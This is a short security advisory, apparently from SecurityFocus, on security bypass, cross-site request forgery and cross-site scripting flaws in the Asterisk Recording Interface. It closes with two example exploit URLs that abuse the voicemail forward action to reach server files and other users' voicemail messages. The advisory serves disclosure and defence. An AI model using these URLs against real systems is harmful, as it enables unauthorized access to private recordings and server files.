15 lines
No EOL
1,011 B
Text
15 lines
No EOL
1,011 B
Text
source: https://www.securityfocus.com/bid/41571/info
|
|
|
|
The Asterisk Recording Interface is prone to the following issues:
|
|
|
|
1. Multiple security bypass vulnerabilities.
|
|
2. A cross-site request-forgery vulnerability.
|
|
3. A cross-site scripting vulnerability.
|
|
|
|
Attackers can exploit these issues to steal cookie-based authentication credentials, gain unauthorized access to the application, bypass certain security restrictions, disclose sensitive information, or cause denial-of-service conditions.
|
|
|
|
The following example URIs are available:
|
|
|
|
http://www.example.com/recordings/index.php?m=Voicemail&f=msgAction&a=forward_to&q=&folder=&start=0&span=15&order=calldate&sort=desc&folder_rx=&mailbox_rx=houston%2F2627&selected7=/var/www/recordings/index.php
|
|
|
|
http://www.example.com/recordings/index.php?m=Voicemail&f=msgAction&a=forward_to&q=&folder=INBOX&start=0&span=15&order=calldate&sort=desc&folder_rx=&mailbox_rx=houston%2F4949&selected7=%2Fvar%2Fspool%2Fasterisk%2Fvoicemail%2Fhouston%2F2625%2FINBOX%2Fmsg0000.txt |